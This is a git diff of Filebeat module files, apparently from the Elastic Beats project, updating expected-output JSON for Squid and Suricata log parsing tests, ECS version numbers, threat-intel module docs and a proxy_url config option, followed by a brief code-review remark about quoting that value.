@@ -5620,12 +5699,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "internal.example.org" + "internal.example.org", + "example.com" ], "related.ip": [ - "10.0.0.240", - "10.18.199.203" + "10.18.199.203", + "10.0.0.240" ], "related.user": [ "ittenb" @@ -5665,6 +5744,7 @@ "url.top_level_domain": "org", "user.name": "ittenb", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -5691,8 +5771,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "www5.example.com" + "www5.example.com", + "www5.example.org" ], "related.ip": [ "10.73.80.251", @@ -5703,8 +5783,8 @@ ], "rsa.internal.messageid": "NONE", "rsa.misc.action": [ - "allow", - "NONE" + "NONE", + "allow" ], "rsa.misc.content_type": "lumquid", "rsa.misc.result_code": "serro", @@ -5736,6 +5816,7 @@ "url.top_level_domain": "com", "user.name": "ercitati", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -5762,8 +5843,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www.example.net", - "api.example.org" + "api.example.org", + "www.example.net" ], "related.ip": [ "10.22.34.206", @@ -5774,8 +5855,8 @@ ], "rsa.internal.messageid": "PURGE", "rsa.misc.action": [ - "block", - "PURGE" + "PURGE", + "block" ], "rsa.misc.content_type": "velites", "rsa.misc.result_code": "uasiarch", 
@@ -5807,6 +5888,7 @@ "url.top_level_domain": "net", "user.name": "mve", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", @@ -5837,8 +5919,8 @@ "www.example.net" ], "related.ip": [ - "10.199.103.185", - "10.62.168.226" + "10.62.168.226", + "10.199.103.185" ], "related.user": [ "ipsa" @@ -5880,6 +5962,7 @@ "url.top_level_domain": "net", "user.name": "ipsa", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -5906,8 +5989,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.com", - "www5.example.com" + "www5.example.com", + "example.com" ], "related.ip": [ "10.97.33.56", @@ -5949,6 +6032,7 @@ "url.top_level_domain": "com", "user.name": "ptate", "user_agent.device.name": "Asus X01BDA", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36", "user_agent.os.full": "Android 10", @@ -5979,8 +6063,8 @@ "www5.example.com" ], "related.ip": [ - "10.49.169.175", - "10.115.154.104" + "10.115.154.104", + "10.49.169.175" ], "related.user": [ "ore" 
@@ -5990,8 +6074,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "HEAD", - "allow" + "allow", + "HEAD" ], "rsa.misc.content_type": "tatis", "rsa.misc.result_code": "Sedut", @@ -6021,6 +6105,7 @@ "url.top_level_domain": "com", "user.name": "ore", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6051,8 +6136,8 @@ "internal.example.com" ], "related.ip": [ - "10.213.100.153", - "10.33.112.100" + "10.33.112.100", + "10.213.100.153" ], "related.user": [ "enimad" @@ -6092,6 +6177,7 @@ "url.top_level_domain": "org", "user.name": "enimad", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -6122,8 +6208,8 @@ "example.net" ], "related.ip": [ - "10.216.143.226", - "10.25.53.93" + "10.25.53.93", + "10.216.143.226" ], "related.user": [ "oremeu" @@ -6132,8 +6218,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "cancel", - "CONNECT" + "CONNECT", + "cancel" ], "rsa.misc.content_type": "urau", "rsa.misc.result_code": "lla", 
@@ -6165,6 +6251,7 @@ "url.top_level_domain": "net", "user.name": "oremeu", "user_agent.device.name": "Samsung GT-P3100 ", + "user_agent.device.type": "Tablet", "user_agent.name": "Android", "user_agent.original": "Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30", "user_agent.os.full": "Android 4.0.3", @@ -6239,6 +6326,7 @@ "url.top_level_domain": "net", "user.name": "mSecti", "user_agent.device.name": "G8142", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", @@ -6265,8 +6353,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.net", - "www5.example.com" + "www5.example.com", + "api.example.net" ], "related.ip": [ "10.60.56.205", @@ -6310,6 +6398,7 @@ "url.top_level_domain": "com", "user.name": "ita", "user_agent.device.name": "iPhone", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]", "user_agent.os.full": "iOS 13.4.1", @@ -6340,16 +6429,16 @@ "www5.example.net" ], "related.ip": [ - "10.245.251.98", - "10.6.11.124" + "10.6.11.124", + "10.245.251.98" ], "related.user": [ "tvolu" ], "rsa.internal.messageid": "DELETE", "rsa.misc.action": [ - "DELETE", - "accept" + "accept", + "DELETE" ], "rsa.misc.content_type": "onsequ", "rsa.misc.result_code": "strud", 
@@ -6381,6 +6470,7 @@ "url.top_level_domain": "com", "user.name": "tvolu", "user_agent.device.name": "QMobile X700 PRO II", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -6407,12 +6497,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "mail.example.org" + "mail.example.org", + "www5.example.org" ], "related.ip": [ - "10.145.25.55", - "10.99.55.115" + "10.99.55.115", + "10.145.25.55" ], "related.user": [ "lumd" @@ -6454,6 +6544,7 @@ "url.top_level_domain": "org", "user.name": "lumd", "user_agent.device.name": "ZTE BLADE V7", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 6.0", @@ -6525,6 +6616,7 @@ "url.top_level_domain": "com", "user.name": "rem", "user_agent.device.name": "Notepad_K10", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36", "user_agent.os.full": "Android 9", @@ -6555,8 +6647,8 @@ "example.com" ], "related.ip": [ - "10.252.146.132", - "10.163.9.35" + "10.163.9.35", + "10.252.146.132" ], "related.user": [ "umq" @@ -6565,8 +6657,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "accept", - "CONNECT" + "CONNECT", + "accept" ], "rsa.misc.content_type": "ota", "rsa.misc.result_code": "oremip", 
@@ -6598,6 +6690,7 @@ "url.top_level_domain": "org", "user.name": "umq", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6636,8 +6729,8 @@ ], "rsa.internal.messageid": "DELETE", "rsa.misc.action": [ - "DELETE", - "deny" + "deny", + "DELETE" ], "rsa.misc.content_type": "uameiu", "rsa.misc.result_code": "porinc", @@ -6669,6 +6762,7 @@ "url.top_level_domain": "com", "user.name": "upta", "user_agent.device.name": "Samsung SM-A260G", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile WebView", "user_agent.original": "Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36", "user_agent.os.full": "Android 8.1.0", @@ -6699,16 +6793,16 @@ "internal.example.com" ], "related.ip": [ - "10.140.170.171", - "10.73.218.58" + "10.73.218.58", + "10.140.170.171" ], "related.user": [ "tinv" ], "rsa.internal.messageid": "TRACE", "rsa.misc.action": [ - "TRACE", - "block" + "block", + "TRACE" ], "rsa.misc.content_type": "umq", "rsa.misc.result_code": "nse", @@ -6740,6 +6834,7 @@ "url.top_level_domain": "com", "user.name": "tinv", "user_agent.device.name": "U307AS", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36", "user_agent.os.full": "Android 9", 
@@ -6766,20 +6861,20 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "example.net", - "example.com" + "example.com", + "example.net" ], "related.ip": [ - "10.248.156.138", - "10.67.148.40" + "10.67.148.40", + "10.248.156.138" ], "related.user": [ "squamest" ], "rsa.internal.messageid": "OPTIONS", "rsa.misc.action": [ - "deny", - "OPTIONS" + "OPTIONS", + "deny" ], "rsa.misc.content_type": "siuta", "rsa.misc.result_code": "emveleum", @@ -6809,6 +6904,7 @@ "url.top_level_domain": "net", "user.name": "squamest", "user_agent.device.name": "Generic Smartphone", + "user_agent.device.type": "Other", "user_agent.name": "Opera Mini", "user_agent.original": "Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16", "user_agent.os.name": "Symbian OS", @@ -6845,8 +6941,8 @@ ], "rsa.internal.messageid": "UNLOCK", "rsa.misc.action": [ - "UNLOCK", - "accept" + "accept", + "UNLOCK" ], "rsa.misc.content_type": "sum", "rsa.misc.result_code": "oloremq", @@ -6878,6 +6974,7 @@ "url.top_level_domain": "com", "user.name": "eatae", "user_agent.device.name": "Meizu M6", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30", "user_agent.os.full": "Android 7.0", @@ -6904,8 +7001,8 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "www5.example.org", - "www5.example.net" + "www5.example.net", + "www5.example.org" ], "related.ip": [ "10.14.29.202", 
@@ -6949,6 +7046,7 @@ "url.top_level_domain": "net", "user.name": "usmod", "user_agent.device.name": "Samsung SM-A305FN", + "user_agent.device.type": "Phone", "user_agent.name": "YandexSearch", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10", "user_agent.os.full": "Android 10", @@ -6975,12 +7073,12 @@ "observer.type": "Proxies", "observer.vendor": "Squid", "related.hosts": [ - "api.example.com", - "example.com" + "example.com", + "api.example.com" ], "related.ip": [ - "10.204.223.184", - "10.221.86.133" + "10.221.86.133", + "10.204.223.184" ], "related.user": [ "ptasnul" @@ -6989,8 +7087,8 @@ "rsa.investigations.ec_subject": "NetworkComm", "rsa.investigations.ec_theme": "ALM", "rsa.misc.action": [ - "POST", - "deny" + "deny", + "POST" ], "rsa.misc.content_type": "rerepr", "rsa.misc.result_code": "mcorpor", @@ -7022,6 +7120,7 @@ "url.top_level_domain": "com", "user.name": "ptasnul", "user_agent.device.name": "Samsung SM-A715F", + "user_agent.device.type": "Phone", "user_agent.name": "Facebook", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]", "user_agent.os.full": "Android 10", @@ -7052,16 +7151,16 @@ "api.example.org" ], "related.ip": [ - "10.229.39.190", - "10.195.4.70" + "10.195.4.70", + "10.229.39.190" ], "related.user": [ "edictas" ], "rsa.internal.messageid": "PUT", "rsa.misc.action": [ - "deny", - "PUT" + "PUT", + "deny" ], "rsa.misc.content_type": "exeaco", "rsa.misc.result_code": "rmagnido", 
@@ -7093,6 +7192,7 @@ "url.top_level_domain": "com", "user.name": "edictas", "user_agent.device.name": "STK-L21", + "user_agent.device.type": "Phone", "user_agent.name": "Chrome Mobile", "user_agent.original": "Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91", "user_agent.os.full": "Android 10", diff --git a/x-pack/filebeat/module/suricata/eve/config/eve.yml b/x-pack/filebeat/module/suricata/eve/config/eve.yml index bac91dff1d7..4f290f47525 100644 --- a/x-pack/filebeat/module/suricata/eve/config/eve.yml +++ b/x-pack/filebeat/module/suricata/eve/config/eve.yml @@ -58,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json index e8f77f9033a..32f58f199c2 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-6.0.log-expected.json @@ -81,6 +81,7 @@ "url.original": "/uid/index.html", "url.path": "/uid/index.html", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json index 457a16da86f..b36753a368c 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-alerts.log-expected.json @@ -76,6 +76,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" 
@@ -157,6 +158,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -238,6 +240,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -319,6 +322,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -400,6 +404,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -481,6 +486,7 @@ "url.original": "/", "url.path": "/", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "curl", "user_agent.original": "curl/7.58.0", "user_agent.version": "7.58.0" @@ -561,6 +567,7 @@ "url.original": "/ubuntu/dists/bionic-security/InRelease", "url.path": "/ubuntu/dists/bionic-security/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -642,6 +649,7 @@ "url.original": "/ubuntu/dists/bionic/InRelease", "url.path": "/ubuntu/dists/bionic/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", 
@@ -723,6 +731,7 @@ "url.original": "/ubuntu/dists/bionic-updates/InRelease", "url.path": "/ubuntu/dists/bionic-updates/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -804,6 +813,7 @@ "url.original": "/ubuntu/dists/bionic-security/main/source/by-hash/SHA256/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72", "url.path": "/ubuntu/dists/bionic-security/main/source/by-hash/SHA256/f5ec03d97ca76c98162d9233c8b7c578c52897e2136428277baf2e7b633a8e72", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -885,6 +895,7 @@ "url.original": "/ubuntu/dists/bionic-security/main/binary-amd64/by-hash/SHA256/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015", "url.path": "/ubuntu/dists/bionic-security/main/binary-amd64/by-hash/SHA256/c5b8346a3221bc9a23a79ba4dc4e730a6319a77fc9d63872dfc56539a0810015", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -966,6 +977,7 @@ "url.original": "/ubuntu/dists/bionic-security/universe/binary-amd64/by-hash/SHA256/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558", "url.path": "/ubuntu/dists/bionic-security/universe/binary-amd64/by-hash/SHA256/e5cc957139a25a0fee47cbf2c0fac8ad5cab50346d6a74abe031748924c5b558", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", 
@@ -1047,6 +1059,7 @@ "url.original": "/ubuntu/dists/bionic-backports/InRelease", "url.path": "/ubuntu/dists/bionic-backports/InRelease", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1128,6 +1141,7 @@ "url.original": "/ubuntu/dists/bionic-updates/main/source/by-hash/SHA256/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03", "url.path": "/ubuntu/dists/bionic-updates/main/source/by-hash/SHA256/65f2e3a4e9d89d9d4b5e3d42e586bc96f48a24466b0ad0b4a707255e44a26b03", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1209,6 +1223,7 @@ "url.original": "/ubuntu/dists/bionic-updates/universe/source/by-hash/SHA256/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef", "url.path": "/ubuntu/dists/bionic-updates/universe/source/by-hash/SHA256/56cfd9cc2efa61dff7428dddf921c3cd6047ab8e6484a7f1888e4c3f7252f1ef", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1290,6 +1305,7 @@ "url.original": "/ubuntu/dists/bionic-updates/main/binary-amd64/by-hash/SHA256/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70", "url.path": "/ubuntu/dists/bionic-updates/main/binary-amd64/by-hash/SHA256/4360137dc8f98b47648da1fef5472ef234fb02115bc2b29873bcaeee62637e70", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", 
@@ -1371,6 +1387,7 @@ "url.original": "/ubuntu/dists/bionic-updates/restricted/binary-amd64/by-hash/SHA256/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12", "url.path": "/ubuntu/dists/bionic-updates/restricted/binary-amd64/by-hash/SHA256/c93fdc7f10cad1263349fd7b5bdd6a7f7163165b96ad263b3e12022e319d0d12", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1452,6 +1469,7 @@ "url.original": "/ubuntu/dists/bionic-updates/universe/binary-amd64/by-hash/SHA256/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc", "url.path": "/ubuntu/dists/bionic-updates/universe/binary-amd64/by-hash/SHA256/5190f7afbee38b3cb32225db478fdbabd46f76eaa9c5921a13091891bf3e9bbc", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", @@ -1532,6 +1550,7 @@ "url.original": "/ubuntu/dists/bionic-updates/universe/i18n/by-hash/SHA256/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4", "url.path": "/ubuntu/dists/bionic-updates/universe/i18n/by-hash/SHA256/9fe539b7036e51327cd85ca5e0a4dd4eb47f69168875de2ac9842a5e36ebd4a4", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", 
@@ -1612,6 +1631,7 @@ "url.original": "/ubuntu/dists/bionic-updates/multiverse/binary-amd64/by-hash/SHA256/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16", "url.path": "/ubuntu/dists/bionic-updates/multiverse/binary-amd64/by-hash/SHA256/8ab8cb220c0e50521c589acc2bc2b43a3121210f0b035a0605972bcffd73dd16", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Debian APT-HTTP", "user_agent.original": "Debian APT-HTTP/1.3 (1.6.3ubuntu0.1)", "user_agent.os.name": "Debian", diff --git a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json index 50125bc3f3c..86962b58d98 100644 --- a/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json +++ b/x-pack/filebeat/module/suricata/eve/test/eve-small.log-expected.json @@ -154,6 +154,7 @@ "url.original": "/dd.xml", "url.path": "/dd.xml", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "user_agent.os.full": "Mac OS X 10.13.5", @@ -215,6 +216,7 @@ "url.original": "/ssdp/device-desc.xml", "url.path": "/ssdp/device-desc.xml", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Chrome", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "user_agent.os.full": "Mac OS X 10.13.5", @@ -586,6 +588,7 @@ "url.path": "http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab", "url.query": "111111111111", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Microsoft-CryptoAPI", "user_agent.original": "Microsoft-CryptoAPI/10.0", "user_agent.version": "10.0" 
@@ -705,6 +708,7 @@ "url.path": "/uuid", "url.port": 8081, "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc index bf278ed270f..772bdda50b2 100644 --- a/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/threatintel/_meta/docs.asciidoc @@ -120,7 +120,7 @@ should look initially, and optionally any filters used to filter the results. var.input: httpjson var.url: https://SERVER/events/restSearch var.api_token: xVfaM3DSt8QEwO2J1ix00V4ZHJs14nq5GMsHcK6Z - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- @@ -142,7 +142,7 @@ reference the MISP fields located on the MISP server itself. var.filters: - type: ["md5", "sha256", "url", "ip-src"] - threat_level: 4 - var.initial_interval: 24h + var.first_interval: 24h var.interval: 60m ---- diff --git a/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml index 145dfe246dd..dbca8bb91b4 100644 --- a/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml +++ b/x-pack/filebeat/module/threatintel/abusemalware/config/config.yml @@ -8,6 +8,9 @@ request.method: GET {{ if .ssl }} request.ssl: {{ .ssl | tojson }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.transforms: - set: @@ -41,4 +44,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.6.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml b/x-pack/filebeat/module/threatintel/abusemalware/manifest.yml index e3159060cd8..5fe3a155180 100644 
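Review bot: In the abusemalware `config.yml` hunk, the added `request.proxy_url: {{ .proxy_url }}` writes the operator-supplied value into the rendered YAML as a bare scalar, while the `request.ssl` line just above it pipes its value through `tojson`. A proxy URL often carries userinfo (`http://user:pass@host:port`), and a password containing YAML-significant characters could change how that line parses, so I would render it as `request.proxy_url: {{ .proxy_url | tojson }}` to keep it a quoted string. The neighbouring `request.url: {{ .url }}` is also unquoted, so the new line follows the file's existing habit, but the proxy value is the one likely to hold a secret. The same three added lines appear in the abuseurl, anomali, misp and otx `config.yml` hunks of this commit.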
